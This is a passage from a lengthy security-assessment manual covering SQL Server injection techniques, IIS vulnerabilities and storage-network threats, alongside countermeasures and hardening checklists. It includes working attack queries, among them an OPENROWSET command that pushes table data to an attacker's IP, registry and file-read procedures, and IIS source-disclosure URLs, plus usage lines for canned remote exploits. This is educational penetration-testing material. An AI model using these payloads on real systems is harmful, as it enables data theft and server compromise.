Below is the example how data can be directed to the remote data source:
insert into
OPENROWSET (‘SQLOLEDB’ ‘server = servername; uid = sa; pwd = sa’,
‘select * form table1’) select * from table2)
The above example will append all the data from local table ‘table2’ to the ‘table1’ of
the remote database. Similarly an attacker can redirect data from the remote
database to its local database using OPENROWSET function. For ex:
Insert into
OPENROWSET (‘SQLOLEDB’, ‘uid = sa; pwd =sa; network = abcd, 1433;
address = hackers_ip_address; ‘select * from table1’)
Select * from table2
The above example will first retrieve all the data from the remote data source ‘table2’&
then transfer it at the hacker’s data source ‘table1’ situated at the given network address.
Note:
In order to push or pull the data to & from the remote data source the structure of the
remote & local data source must be identical. Using the OPENROWSET command an
attacker can get any desired information from the remote server. For ex: an attacker can
get critical information from the databases like sysobjects, syscolumns, sysdatabse,
sysxlogins etc.
Page 792 of 1123
Q.11.6
Xp_regread and Xp_regwrite extended procedure:
An attacker can use extended procedure to read or change the registry contents. He can
use extended procedure xp_regread to read the registry of the system or xp_regwrite to
write in the system registry. For example, to read the value “TestValue” from the key,
'SOFTWARE\Test' of 'HKEY_LOCAL_MACHINE' into the variable @test the attacker
can use:
DECLARE @test varchar (20)
EXEC master..Xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Test', @value_name ='TestValue', @value=@test
OUTPUTSELECT @test
Some more e.g. are:
Exec xp_regread HKEY_LOCAL_MACHIN,
'SYSTEM\Cureentcontrolset\Services\lanmanserver\parameters','nullsessionshare'
(This determines what null-session shares are available on the server)
Exec xp_regenumvalues HKEY_LOCAL_MACHINE, '
SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
(This will reveal all of the SNMP communities Configured on the server. With this
information, an attacker can probably reconfigure network appliances in the same area
of the network, since SNMP communities tend to be infrequently changed, and shared
among many hosts)
E.g. of xp_regwrite:
EXECUTE xp_regwrite [@rootkey =] 'rootkey', [@key =]'key', [@ value_name
=]'value_name', [@ type =]'type', [@ value =]'value'
For example, to write the variable 'Test' to the 'TestValue' value, key 'SOFTWARE\Test',
'HKEY_LOCAL_MACHINE' an attacker can use:
Page 793 of 1123
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Test', @value_name='TestValue', @type='REG_SZ',
@value='Test'
Q.11.7
Xp_servicecontrol Extended Procedure:
Master..xp_servicecontrol extended procedure allows an attacker to start, stop & pause
a service. For e.g.
Exec master..xp_servicecontrol 'start','schedule'
Exec master..xp_servicecontrol 'star
Note:
There are lots of extended procedures available in MS-SQL Server but we are not going
in to detail of each & every procedure.
Q.11.8
Adding Extended Stored Procedures
An attacker can add customize extended procedures at the remote server. One way of
doing this is create a stored procedure DLL that carries malicious code & then uploads
that DLL on the server. There are several ways to upload DLL file on the server like
using sp_addextendedproc extended procedures. Here is the example that how a DLL
can be uploaded on the server:
sp_addextendedproc ‘xp_myproc’, ‘c:\mydoc\xp_myproc.dll’
Once the DLL is loaded on the server the extended procedure can be used in the normal
way. For example xp_myproc can be run as
exec xp_myproc;
List of Some other useful extended Procedures
xp_availablemedia
Reveals the available drives on the machine.
xp_dirtree
Allows a directory tree to be obtained.
xp_enumdsn
Enumerates ODBC data sources on the server.
Page 794 of 1123
xp_makecab
xp_makecab
Reveals information about the security mode of the
server.
Allows the user to create a compressed archive of files on
the server.
xp_ntsec_enumdomains
Enumerates the domains that the server can access.
xp_terminate_process
Terminates a process, given its PID.
Bulk Insert Statement
Using Bulk insert statement, it is possible to insert a text file into a temporary table. So
the attacker can easily read a file on the web server by first converting it in to database
table & then use union clause against this table.
Following is the procedure:
First create a table:
create table temp_table (Col varchar(8000))
Then, use bulk insert statement to insert data from desired file to this table. That can be
done by statement:
bulk insert temp_table from ‘c:\inetpub\wwwroot\verify.asp’
After execution of this statement the table contains code of the page verify.asp & this
code can be displayed in the browser using any of the above error message technique
like Union. (This is very useful for obtaining the source code of scripts stored on the
database server, or possibly the source code of ASP pages.)
BCP Statement
The BCP utility copies data between an instance of Microsoft SQL Server 2000 and a
data file in a user-specified format. Thus an attacker can create a text file containing all
data from the desired table & after storing that file in the web server’s directory he can
access it from his web browser. Here is the example how an attacker can read data of
our authentication table using BCP command:
bcp “select * form authentication” queryout c:\ inetpub\ wwwroot\
Page 795 of 1123
authentication_file.txt –S Pen-test –U sa –p Sa
Note:
-S specifies Server name.
-U specifies user name.
-P specifies password.
When this command be executed, the data from the authentication table will be stored in
the file “c:\inetpub\wwwroot\authentication_file.txt” & attacker can access this file from
his browser.
Using Time Delays as a Communication channel
Frequently an attacker is placed in the position of being able to execute a command in
some system, but being unsure whether it is running correctly. This is due to the
absence of error messages from the system that they are attacking. In such scenario
time delay is the possible option.
For example: In SQL Server, the command
waitfor delay ‘0:0:5’ will cause the query to pause for 5 seconds at that point
This provides the attacker with a means of communication information from the database
server to the browser. Since all the web applications wait for completion of the query
before returning content to the browser, the attacker can use time delays to get yes/no
answers to various appropriate questions about the database & its environment.
For example, to check, if SQL Server is running as ‘sa’ user? use:
if (select user) = ‘sa’ waitfor delay ‘0:0:5’
If the application takes more than five seconds to return, then we are connected to the
database as ‘sa’ user.
ƒ
To check ‘pubs’ sample database exists?
if exists (select * from pubs..Pub_info) waitfor delay ‘0:0:5’
Page 796 of 1123
Q.11.9
To check, are there any rows in the table ‘authentication’?
if exists (select * from authentication) waitfor delay ‘0:0:5’
[If the application takes more than 5 seconds to return, that’s the indication of successful
command execution.]
Linked Server
A linked server allows access to distributed, heterogeneous queries against OLE DB
data sources. After creating a linked server with “sp_addlinkedserver”, this linked server
can then execute distributed queries on the server. So using linked server an attacker
being granted the ability to query the remote servers. These links are stored in the
“master..Sysservers” table
Executing SQL Queries using the OPENQUERY Function:
The OPENQUERY function accepts two parameters: the name of the linked server and
the text of the query to pass. For ex., this query returns the total sales grouped by
customer gender:
select * from openquery (LINKED_OLAP, 'select [Customer Gender: Gender], sum
([measures:unit sales]) from sales group by [Customer Gender:Gender]')
ActiveX Automation Scripts in SQL server:
SQL Server provides several built in extended procedures, which allow the users to
create ActiveX automation scripts. These scripts are functionally same as different
scripts like VB Script & Java Scripts. Using these scripts in SQL server we can create
objects & interact with them. Here is the example to create instance of notepad:
declare @obj int
exec sp_Ocreate ‘my.shell’ , @ obj out
exec sp_Oamethod @obj, ‘run’ ,’NULL’ ‘Notepad.exe’
An attacker can create his own scripts to perform a desired task like reading contents of
a known file on the server.
Note:
Only members of the sysadmin fixed server role can execute Sp_OACreate.
Page 797 of 1123
Q.12 MAP INTERNAL NETWORK
Q.13 RUN AUTOMATED SCANNER
In case you haven’t found the SQL Injection vulnerability you can run the the automated
scanner. This can also be done after performing all tests mentioned above to cover other
holes which may remain while manual assessment.
Q.14 TOLLS AND THEIR USES
Tools Used to check SQL Injection Vulnerability
1. Miliekoek with HTTrack.
2. Web Sleuth.
3. Netcat
4. Achilles
5. Curl
Q.14.1
Miliekoek
This tool helps detecting sites vulnerable to the SQL Injections. This tool does not check
web sites online for vulnerability but it works with the Website stored on the client itself.
Before using this tool we have to use HTTRACK tool to download a complete World
Wide Web site on the client site. So this tool works in conjunction with HTTRACK tool.
How mieliekoek works?
This tool (written in pearl script) takes the output of a web mirroring tools as input. It
inspects every file and determine if there is a form in the file, if so it tries to do some form
of SQL insertion (inserts blah' in all fields) and looks at the output - if it sees "ODBC" it
marks the form as vulnerable.
Q.14.2
HTTRACK
How to use HTTRACK?
Page 798 of 1123
HTTRACK takes the following basic parameters:
1) Project name: Any name for the project.
2) Web site address: Address of the web site to download
3) Destination directory: Local Directory name where it downloads the Website.
After we have WebSites stored in our local directory we can use mieliekoek tool can be
used to check that the web site for SQL Injection vulnerability. This tool is written in the
pearl script & syntax of using this tool is:
$/> mieliekoek.pl <local directory name> <target site name>
This tool actually tries to enter value of the variable “badstring” in the input fields of the
site & then check if there are any ODBC error message generated by given input. At a
time we can only give one input in the “badstring” variable, but we can try different
combinations by changing the value of variable “badstring” in the script & then running
the script again.
I have tried this tool on a very small site ‘1’ (which contains a form, which is vulnerable to
the SQL Injections.). But according to this tool there is no SQL injection vulnerability in
this site. So I am not sure about the accuracy of this tool.
I got O/P something like:
finished...
7 files
3 forms
0 vulnerable forms
I tried the same tool again on a large site to (I don't know whether the site is vulnerable
to SQL injection or not) & got the following o/p:
Finished...
183 files
67 forms
0 vulnerable forms
I tried the same tool again on a big site 2 3 (I don't know whether the site is vulnerable to
SQL injection or not) & got the following o/p:
Finished...
34 files
Page 799 of 1123
10 forms
0 vulnerable forms
Q.14.3
Web Sleuth
The Web Sleuth tool is a proxy, which contains a plugin to check SQL Injections. This
plugin is not by default a part of the Web Sleuth tool but we can download this plugin
from the site http:\\www.sandsprite.com
There are two ways to test for vulnerability of a site for SQL injection using web sleuth
tool. First is using “Test Inputs” option & second is using “SQL Injection plugin”. I have
performed SQL injection using both ways but I did not get correct result from any of the
above options. First I tried with the SQL Injection tool, which required the SQL Server
name & it’s password. I had given both the inputs properly but it was generating some
error. I also tried with the other option it ran successfully but it had not generated
produced any report. In the report it was showing only name of site on which the test is
performed so I was not getting whether the site I am testing is vulnerable to SQL
Injections or not.
Q.14.4
Netcat
Netcat is a beautiful tool that let´s you read and write data through TCP or UDP
connections. The main advantage of its use in relation with SQL Injection, is at the time
ok making manual verifications. The connection just has to be established and canalize
a text file with anticipation, containing the post with the indicated strings. Because of its
nature, Netcat reads and writes "pure" HTTP, what sometimes can be an advantage at
teh moment of detecting "things" that could be not seen with the use of more specific
tools.
Q.14.5
Achilles
Achilles is a proxy, that lets you easily intercept and modify the HTTP traffic "on the fly"
at the moment of testing a web application. It is usually very useful in those cases where
we need to log our actions of "manual" testing. Although its primitive version does not
include any plugin respecting to SQL Injection, its use can be very helpful in web
applications testing in general and of SQL injection in particular.
Page 800 of 1123
Q.14.6
Curl
Just as it is described in its web (http://curl.haxx.se) “Curl is a command line tool for
transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, GOPHER,
TELNET, DICT, FILE and LDAP. Curl supports HTTPS certificates, HTTP POST, HTTP
PUT, FTP uploading, kerberos, HTTP form based upload, proxies, cookies,
user+password authentication, file transfer resume, http proxy tunneling […]”
There are some circumstances in which, making a good use of this tool we will save a lot
of time of work. Although its true that we will have to use this tool for some time until we
get used to it, it’s capability to establish secure connections (with OpenSSL) and also its
special options (Custom FTP Commands) are of a great utility at the moment of testing
SQL Injection situations in secure servers.
Just as an example, we could be making a POST to our objective site executing a
command of similar aspect to:
curl -d "user=MyUser&password=MyPass" http://target.com/auth.asp
Q.15 COUNTERMEASURE
•
Validate Input properly.
•
Do not allow users to enter special symbols like ‘ ; -- “ % * _ etc.
•
Replace single ‘ with space. Using replace function like:
•
Replace (request.form (“name”),”’”,” “)
•
Replace single ‘ with ‘’
•
Replace (request.form (“name”), “’”,”’’”)
•
If input in question is numeric then use numeric function like isnumber ( ) to
check whether input is numeric or not.
•
Use procedures instead of writing queries directly in the recordset object.
•
Give only necessary privileges to the users.
•
Drop unnecessary system procedure, so that nobody can use it maliciously.
•
Guidelines for Coding
•
Use strongly typed parameters, if possible in combination with stored
procedures, to pass queries into the database.
Page 801 of 1123
•
Use application-only logins rather than ‘sa’ or the ‘dbo’ account.
•
Grant only the ‘EXECUTE’ access to necessary stored procedures.
•
Separate utilities should have separate access.
•
Remove or disable any unnecessary extended stored procedures.
Q.16 REFERENCES
[1] Kevin Spett, SQL Injection
http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf ,
[2] Kevin Spett, Blind SQL Injection
http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf,
[3] SQL Injection Walkthrough
http://www.securiteam.com/securityreviews/5DP0N1P76E.html,
[4] Chris Anley, Advanced SQL Injection in SQL Server Application
http://www.nextgenss.com/papers/advanced_sql_injection.pdf,
[5] Mitchell Harper, SQL Injection Attack: Are you safe?
http://www.sitepoint.com/article/794,
[6] SQL Injection FAQ
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23,
[7] Alexander Chigrik, Useful Undocumented SQL Server Extended Stored Procedure
http://www.sql-server-performance.com/ac_extended_stored_procedures.asp,
[8] Phil Rasmussen, SQL Injection Attack Nastiness
http://www.mossyblog.com/entries/1AA9064B-C158-2208-9D405C20397CEAB5.cfm,
[9] Ofer Maor, Amichai Shulman, Blindfolded SQL Injection
http://www.webcohort.com/web_application_security/research/white_papers/Blindfolded
_SQL_Injection.pdf,
Page 802 of 1123
[10] Quick Sort Algorithm
http://linux.wku.edu/~lamonml/algor/sort/quick.html,
[11] Quick Sort Algorithm in C
http://ciips.ee.uwa.edu.au/~morris/Year2/PLDS210/qsort.html
Page 803 of 1123
R WEB APPLICATION SECURITY (CONTINUE…) WEB
SERVER SECURITY ASSESSMENT
R.1 MICROSOFT INTERNET INFORMATION SERVER
Description
Microsoft Internet Information Server has a big history of vulnerabilities. As per it's nature
till IIS version 5.0 it provides various services by default. They have fairly limited this in
IIS version 6.0. IIS security testing can be divided into three major categories. 1.
Information Disclosure 2. Buffer Overflow and 3. File System Traversal.
Microsoft has provided service packs from time to time and an attacker take advantage
of lack of patch implication. Most of the time people put service packs but they miss hot
fixes.
Other important aspect to consider while testing security of IIS is firewall. Several time
you may get vulnerability and related proof of concept tool but it may be blocked on
firewall because you may not get required port opened.
R.1.1 Summary
Extentio
Requirement
n
.asp
Vulnerability
and HTTP
Reference
ASP
GET Expected
Pre
Request
Response
requisite
/default.asp+.h
200 OK
default.a
related Buffer Overflows:
functionality
Search
www.Microsoft.com
MS02-018
.htr
To
reset Reveals source code
password from Search
Internet
tr
sp
www.Microsoft.com
MS01-04
.idc
Internet
Reveals directory path
/null.idc
500 error
Page 804 of 1123
Database
Search
Connector
www.Microsoft.com
Q193689
.stm,
Server
.shtm,
Include
Side Remote Buffer overflow
Search
.shtml
.printer
Printing
200 OK
Requeste
.shtm, .shtml
d
file
www.Microsoft.com
must
be
MS01-044
present
from Remote Buffer overflow
Internet
/<file>.stm,
/null.printer
500 Internal
Server Error
Search
www.Microsoft.com
MS01-023
.htw
Highlight
text Reveals source code
in web page
/null.htw
Index
200 OK
format Server
Search
"The
www.Microsoft.com
of
MS00-006
QUERY_ST
RING
is
invalid"
.ida, .idq
Index Server
Remote Buffer overflow
/null.ida,
200 OK
Search
/null.idq
"The
www.Microsoft.com
file…
MS01-033
not
Index
IDQ Server
could
be
found."
FrontPa
FrontPage
Remote Buffer overflow
/_vti_bin
501
ge
Server
Search
/_vti_aut
Implemented
Server
Extention
www.Microsoft.com
/fp30reg.dll
Extentio
Not Front
Page
Server
MS01-035
Extention
n
2000
Visual
studio
RAD
Web
Remote
Web
DAV
DAV
remote root exploit.
attempting to
Remote
www.k-otik.com
join shell ...
Successful,
Exploit
Page 805 of 1123
Web
Remote DoS attack
Server
is Method
DAV
www.microsoft.com/tech
DoSsed!
Remote
net/treeview/default.asp
Now run !! F- shall
DoS
?url=/technet/security/b
B-eyee
Attack.
ulletin/MS03-018.asp
after j00...
search
be
is allowed.
The exploit is available
at
www.k-otik.com
R.1.2 Information Disclouser
R.1.2.1 ASP ::$DATA BUG
It occures because of an error in the way IIS parses files. A tricker request allows to
dispaly content of server side files. Type http://www.target.com/default.asp::$DATA in
your browser, it will display the source code of default.asp file in your browser.
Pre Requsite:
1. IIS Version below 3.0
2. File has to be in NTFS partition and should have read access
R.1.2.2 ASP DOT BUG
Displays asp source code of by appending one or more dot to the end of URL.
http://www.target.com/products.asp.
In the end of obove url an extra dot is added. IIS would not be able to handle this
request well and it will reveal source code.
Pre Requesites:
1. Till IIS 3.0
2. Read access to desired resource.
R.1.2.3 +.HTR BUG
Reveals the source code by giving +.htr in the end of request.
http://www.target.com/abc.asp+.htr
Pre Requsite:
1. IIS 4.0 pre Windows NT 4.0 Service Pack 6a Security Rollup Package (SRP)
Page 806 of 1123
2. IIS 5.0 till SP2 pre Windows 2000 Security Rollup Package 1
R.1.2.4 .IDC, .IDA AND .IDQ BUGS
Similar to .asp bug. This time you will get directory path of IIS instead of source code.
http://www.target.com/abc.idc
This results in full path and can be used to find out further holes.
C:\inetpub\wwwroot\abc.idc not found
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Pre Requsites:
IIS 5.0 without any service pack.
or anything.idq
you will get the path.
R.1.2.5 ISM.DLL BUFFER TRUNCATION
Displays source code of the scripts and the contents of the files by appending space in
hexadecimal and .htr to url.
http://www.target.com/global.asa%20%20(...<=230)global.asa.htr
It reveals the source code of global.asa
Prerequisites: IIS4.0 and 5.0
R.1.2.6 NT SITE SERVER ADSAMPLES BUG
Displays site.csc which contains DSN, UID, PASSWORD etc..
http://www.target.com/adsamples/config/site.csc
Prerequsites:
R.1.2.7 TRANSLATE:F BUG
If some one makes a request for ASP/ASA or anyother scriptable page and adds
“translate:f “ into headers of HTTP GET , then they are come up with complete ASP/ASA
source code.
Pre Requisite: Win2k with SP1 not installed
Page 807 of 1123
R.1.2.8
NULL.HTW
This vulnerability can give the souce code of server side ASP page. The ASP page
could give the valuable information like username and password.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none
%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction, CiHiliteType are the three variables of null.htw. Null.htw
takes input from user on these three varibales. In result you will get source code of
default.asp file.
Prerequsites:
1. Index Server
2. null.htw
R.1.2.9
WEBHITS.DLL & .HTW BUG
Displays source code of ASP and other scripts.
http://www.target.com/nosuchfile.htw
If you get error "format of the QUERY_STRING is invalid" you are vulnerable
Prerequisite: control of the CiWebhitsfile
As the user has control of the CiWebhitsfile argument passed to the .htw file he can
request whatever he wants.
You can find the .htw files in the following locations of different iis web servers
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw
Page 808 of 1123
R.1.3 Bufferoverflow
R.1.3.1 WEBDAV REMOTE ROOT EXPLOIT
If IIS5.0 is unpatched, There is a lucky chance that a simple overflow will gain root to
attacker. The exploit written by Schizoprenic is available on www.k-otik.com . It's a
canned exploit again and if your exploits output gives you something like
Successful, attempting to join shell ...
That will means the server is vulnerable. Administrator's first priority shall be to apply
patch on the affected server.
R.1.3.2 WEB DAV
If TRACE method is enabled try Xwbf-v0.3.exe exploit. It works on Port 80 and requires
connection back from target. Hopefully you will find firewall is allowing even connections
from target (Web Server) to Public. This exploit provides root access.
Corporate firewall will not be allowing NetBIOS for Public access, if in case it's allowed
internally, SMBDie can be checked. It works after service Pack 3, hot fix for this is
available. It reboot's Windows 2000 machine.
.htr bufferoverflow against IIS 4.0 by eEye.
R.1.3.3 JILL
jill is written in UNIX C, can also be compile with using Cygwin for Windows 2000.
$ gcc -o jill jill.c
This binary can be run either from the Cygwin shell or from a Win32 console if
cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>
Page 809 of 1123
R.1.3.4 SECHOLE REMOTE EXPLOIT
R.1.3.5 FRONT PAGE 2000 EXTWNSIONS
Buffer overflow in the Front Page 2000 Server Extensions(FPSE 2000), a set of three
programs that support features such as collaborative authoring, hit counters, email formhandling, and editing a Web site directly on a server .
Prequisites:
1. Front Page Server Extention 2000
2. Visual studio RAD
When you install the Front Page Server Extention 2000 fp30reg.dll and fp4areg.dll are
installed by default
When either of these DLLs receives a URL request longer than 258 bytes, a buffer
overflow occurs.
Once an attacker finds that a server is having these dll's, he can use the exploit
"fpse2000ex.exe."
R.1.4 DoS
As pointed out by SPI Dynamics, the vulnerability in IIS 5.0 and IIS 5.1 can lead to
Denial of Service. Worse part is it will be remote and causes the server to restart. The
proof of concept exploit is available at www.k-otik.com . It's a canned exploit so not use it
on your production server. The exploit work as below
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.
R.1.5 File system traversal
R.1.5.1 UNICODE FILE SYSTEM TRAVERSAL
Unicode representations of "/" and "\" are “%c0%af" and "%c1%9c" respectively. There
might even be longer (3+ byte) overlong representations. IIS decodes the UNICODE
Page 810 of 1123
after path checking rather than before. In this unicode representation , it is possible to
use "../" to backup and into the sytem directory and feed the input to the command shell.
R.1.5.2 DOUBLE DECODE FILE SYETEM TRANSFER
Doubly encoded hexadecimal characters also allowed HTTP requests to be constructed
that escaped thenormal IIS security checks and permitted access to resources outside of
the Webroot.
The % character is represented by %25. Thus, the string %255c, if decoded sequentially
two times in sequence, translates to a single backslash. Here we require two decodes
and IIS thus perform two decodes on the HTTP requests that traverse the executable
directories.
R.2 REFRENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html
R.3 INTERNET INFORMATION SYSTEM (IIS) SECURITY CHECKLIST
By Hernán Marcelo Racciatti, Hernan@oissg.org, Coordinator Open Information System
Security Group, Argentina
The steps shown next, are oriented to secure a server running IIS, disconnected of
domain enviroment, commonly an Bastion Host located in portion DMZ of a corporative
network, running the services of IIS.
R.3.1 Steps to Secure:
‰
Step
Notes:
Consider the security of the environment.
DMZ, Networking, border router,
networking, app server, database
server, etc.
‰
Implementing the hardening operating system Use
checklist
and
tools
Page 811 of 1123
from
and apply all the pertinent revisions of security.
‰
Remove
the
components
that
are
software provider.
not Eg.Unused
necessary.
IIS
ISAPI
DLLs
unmapped. Remove sample web
content/applications.
‰
Account running HTTP service should be low
privileged.
‰
Enable Only Essential Web Service Extensions.
‰
Place Content on a Dedicated Disk Volume.
‰
Configure NTFS permissions.
‰
Configure IIS Web Site permissions.
‰
Configure IIS logging. Preferably, in W3C
Without administrative utilities!!
format.
‰
Configure
appropriate
authentication
mechanisms for relevant directories.
‰
Implement Secure Sockets Layer (SSL) and
certificate server.
‰
Install and configure a virus protection solution.
‰
Install and configure IDS from HOST.
‰
Secure well-known accounts.
Rename the built-in Administrator
account,
assign
a
complex
password. Ensure Guest account
is
disabled.
Change
default
account description.
‰
Execute the applications with “protection of IIS 6.0
applications” medium or high.
‰
Secure services accounts.
‰
Implementing security in depth (IPSec Filters).
‰
Implementing IISLockdown and URLScan.
‰
Implementing an assessment policy.
IIS 4.0/5.0
R.3.2 References
Hardening IIS 5.0
Page 812 of 1123
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/
depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5
chk.mspx
Hardening IIS 6.0
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch08.mspx
R.4 APACHE SECURITY ASSESSMENT
R.5 GLOBAL COUNTERMEASURES
•
Secure administrative access
Limit Webserver access to administrators and allow access through secure
authentication mechanisms. In remote management scenarios IP addresses
allowed to administer the Webserver should be clearly defined and the
administrative processes restricted to these specific IP addresses. Adminisrative
access should make use of a secure capability such as secure shell(ssh) or VPN
•
Harden web-server
o
Web-server hosts should have non-essential services disabled
o
Configure syn cookie at OS level to protect against SYN flood attacks
o
Web-server hosts must be updated with the latest security fixes for the
operating system and web server software
o
Web-server hosts should have minimum number of accounts in the
system
o
Remove all non-essential files such as phf from the scripts directory /cgibin.
o
Remove all sample directories and pages that are shipped with web
servers
o
Disable directory browsing especially on folders containing scripts or
executables
o
Do not assign write and script/execute permissions to same folder
Page 813 of 1123
•
o
Disable anonymous access for FTP service
o
Remove unused script mappings
Secure change control procedures
o
Any change on Web-server including web page updation, patch
application and hardware replacement should be documented and
authorized.
o
There should be procedures to continuously track and rectify new security
issues on the deployed Webserver.
o
Website updation procedures must be clearly defined. Do all updates
from the Intranet. Maintain web page originals on a server in the Intranet
and make all changes and updates here; then "push" these updates to
the public server through an SSL connection
•
Enable logging and do periodic analysis
Log all user activity and monitor the logs. Conduct periodic analysis of system
logs to detect suspicious activity.
•
Audit Web server periodically
Conduct periodic security audits to assess the strength of the Webserver. Audit
can be manual verification against a pre-defined checklist or it can also be
automated by tools. Periodic penetration testing of website also adds meaningful
insights on the vulnerabilities of the web server.
•
Run webserver in a chroot jail
o
The damage that a successful attacker can inflict can be further limited by
running web server in a chroot-ed environment. The Unix chroot system
call changes the root directory of a process, such that the process can
then no longer access any of the files above the specified root directory in
the filesystem heirarchy. All web pages and configuration files need to be
in the chroot directory.
o
Run FTP server in a separate chrooted part of the directory tree that is
different from that of the web server
o
For Windows platform limit the top level root directory to an isolated
directory structure with strict permissions configured
•
Compartmentalize web server process
Page 814 of 1123
o
Use of safe application environments in the lines of Trusted Operating
Systems are recommended for isolating the web server process from
other system processes. This will contain attacks and prevent damage
to web servers.
•
Run web server as a non-root user
o
Web servers are susceptible to root compromise using buffer overflow
attacks when web server daemon is run as root. It is safer to run web
server as a non-root user to minimize damages from the attack
•
Implement Web server load balancing
o
Mission critical web sites should have multiple servers on to which the
load is distributed. This will make it difficult to hog the performance of the
server, thereby reducing the chances for performance based denial of
service attacks. It also adds redundancy
Page 815 of 1123
S STORAGE AREA NETWORK (SAN) SECURITY
SANs were basically designed for High availability not for security. Security of the
storage is a very important issue now because of the following factors:
•
Increase in the usage of SANs
•
The nature of the data stored is increasing in value.
•
The threat is increasing as the components are spread in diverse locations, instead
of concentrated in one place that could be physically secured.
•
Firewalls provide perimeter security but do not offer internal security. Also, WAN/LAN
security does not help the SAN.
•
In storage environment, insider threat is high. 70% of security threats are from
insiders .
•
There are risks from snooping, unauthorized access to and modification of data, and
prevention of legitimate access.
•
The concept of SANs is changing because of fast growth in technology.
As the concept is changing the Enterprise is seeing for reducing the storage
management costs, greater storage utilization and increased in availability of data
access.
To achieve the business goals of the enterprise, the enterprise must tackle the
confidentiality, integrity and the availability of the storage.
S.1 STORAGE SECURITY CHALLENGE
S.1.1 Managerial
•
Most organizations are not counting the amount involved in downtime and response
efforts associated with the breaches, they are only calculating the amount involved in
traditional network and internet access controls and defenses.
•
Due to the centralized nature of the corporate data, the network storage resources
represent prime targets.
Page 816 of 1123
•
Storage security costs can be product capital expenditure, deployment, management
and maintenance.
•
The losses are due to the data corruption, which can affect the Company’s ability to
run business and its operations; stolen data can compromise the intellectual
property.
S.1.2 Technical
•
At present, the SAN infrastructure is sufficiently complicated that attacks may not be
widespread.
•
But, as with the internet, security breaches will become more common as scripts
become generally available and as intruders see a higher reward/(risk of being
caught) ratio.
•
This ratio increases dramatically with the connection of SANs to the Internet
S.2 OBJECTIVE
•
To find the storage security threats and the possible attacks on it and to know the
best practices for securing the storage environment.
•
To know the importance of storage security and, how we can protect using best
practices.
S.3 REQUIREMENT
•
Understand Organization’s environment
•
Technical Requirements
S.4 EXPECTED RESULT
By the end of this paper we will understand the importance of security in the storage
environment and what type attacks are possible in the SAN and the best practices for
securing the storage Networks.
S.5 RESOURCES AT RISK
Page 817 of 1123
S.5.1 Data in transit between components of the SAN
•
Availability of infrastructure
•
DoS
•
Configuration errors
•
Data integrity (loss, modification)
•
Data confidentiality
S.5.2 Data at rest
•
Unauthorized access
•
Data integrity (deleted, modified, false creation)
•
Data confidentiality
S.5.3 SAN components
•
Firmware
S.5.4 Out of band management
•
Authentication
•
Integrity
•
Confidentiality
S.6 SAN ATTACK POINTS
S.6.1 Out of band management
•
LAN connection
•
Control terminals interfaces
S.6.2 Inter switch links
•
Remote sites
•
Hosts/servers
•
LAN interfaces
Page 818 of 1123
S.6.3 Removable media
•
Physical security
S.7 STORAGE SECURITY THREATS
Possible Threats
Location of Threat
Unauthorized/unauthenticated access
Storage Network
Insecure management Interfaces
Storage Management
WWN spoofing
Storage
Management
and
Storage
Network
Management control from different access Storage
points
system
Stolen Passwords
Storage
network,
management
and
Network,
Management
and
Management
and
system
Network Sniffing
Storage Network
Disk, media Theft
Storage System
Denial of Service attacks
Storage Network
Remote site/mirror attacks and access
Storage
Network,
system
Server Hosts: Access Control is of primary importance here. Data both at-rest and inflight, is at risk despite use of zoning and logical unit number (LUN) masking to segment
and manage access to the storage network.
Tape media: This technology has some of the most significant vulnerability points,
especially tape libraries located on remote sites. Tape and any other storage media that
is accessible internally, handled by many staff, and often sent out side the confines of
the data center can be vulnerable to unauthorized data access, theft or corruption.
Storage Subsystems and media: The integrity of the data, confidentiality and
availability are primary issues that target data-at-rest.
Storage Fabric: This focuses more on access control and protection of data-in-flight.
Page 819 of 1123
IP and WAN: Data-in-flight is at risk as it is transferred from the storage network across
IP and to a secondary site.
Storage Management: Access Control and data integrity can be at risk for data-at–rest
and data-in-flight, since many storage management tools lack safeguards to enforce
storage security.
Page 820 of 1123
S.8 METHODOLOGY
There are 3 threat zones that affect network storage regardless of the media used.
The threat zones are
1. Systems and connections
2. Storage Fabric
3. Subsystems and Media
The systems and connections include the computer systems such as the application and
management servers and the gateway devices that connect to the storage. The storage
Fabric consists of Hubs, Switches, Routers and the applications that connect and
manage data storage from data sources to storage arrays. The last zone consists of the
Storage subsystems and media.
S.8.1 Find the Vulnerabilities in the Systems and connections.
Procedure
•
There are chances of configuring the management server with the default settings
and unused services
•
Generally the management software of any storage device authenticates locally on
the machine where you installed the management software. Actually the
authentication should happen at the Storage array
•
We can install the same management software on any machine on the network and
access the storage device through that
•
The default passwords of some of the Management software available in the Internet
S.8.2 Identify vulnerabilities in the Storage Fabric.
Procedures
•
The WWN of an HBA is used to authorize the client nodes to the FC Switch. A WWN
number can be changed. By spoofing WWN we can gain the unauthorized access to
data that has been allocated to the spoofed WWN.
Page 821 of 1123
•
When You do the soft zoning based on the WWN , spoofing a WWN will allow an
unauthorized WWN to access the information of the spoofed WWN. Without spoofing
if an unauthorized WWN knows the route to another WWN in another zone then by
enumerating the same in the fabric we can get the Access.
•
When you do the Hard Zoning based on the WWN. Spoofing a WWN will allow an
